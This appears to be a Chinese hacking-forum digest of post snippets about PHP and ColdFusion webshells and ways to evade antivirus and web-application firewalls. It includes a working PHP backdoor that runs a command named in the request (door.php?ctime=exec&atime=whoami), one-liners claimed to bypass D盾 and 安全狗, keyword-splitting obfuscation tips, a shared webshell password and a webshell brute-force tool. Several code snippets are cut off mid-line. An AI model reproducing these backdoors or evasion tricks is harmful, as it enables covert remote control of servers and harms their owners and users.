assert免杀一句话

0x00 eval和assert的区别

http://www.vuln.cn/8395
http://www.php.net/manual/zh/function.eval.php
http://php.net/manual/zh/functions.variable-functions.php

1)assert是函数,eval不是函数,是语言构造器
2)eval($a)中$a只能是字符串,assert($a)中$a可以是php代码,也可以是php代码的字符串,assert($a)的$a如果是字符串形式不能有2个以上的
分号,如果有2个以上的分号只执行到第一个,使用assert来执行多条php语句可借助eval来实现.

分享一cfm大马

cfm马一直比较少,除了菜刀里面那个,好用的不多。今天偶遇这cfm大马,个人觉得还行,就分享出来。东西也不是自己写的就不收TuBi了。表哥们有什么好用的cfm马求在楼下分享。这个大马的密码是:al3frite

乌云社区zone 200+篇文章打包下载

QQ截图20161102104934.jpg

基于字典的webshell的自动化检测爆破

闲着无聊写了一个,识别率可能不太高,根据常见webshell名称作为字典,探测网站是否有前人留下的webshell,自动化识别,并爆破

webshell的自动化检测爆破

中国制造IOT设备遭恶意软件Mirai感染成为近期DDOS攻击主力

cctv-camera-hacking.png

过D盾,安全狗,一句话

其他waf什么的自己测试

//过D盾过安全狗
 
<?php
error_reporting(0);
$b

绕过安全狗写shell和隐藏后门大马

php免杀方法

个人认为免杀大致分为这几个方面:


1.关键字拆分。

         比如assert,可以写成 'a'.'ss'.'e'.'r'.'t'这样。

服务器上捡的php一句话

<?php 
error_reporting(0); 
set_time_limit(0);
function My_base($data,$key){
        $key=md5($key);
       &

2款不易查杀的PHP一句话后门

<?php

//door.php?ctime=exec&atime=whoami

@extract ($_REQUEST);
@die ($ctime($atime));
?>
<?php
//door.php?p={"a":&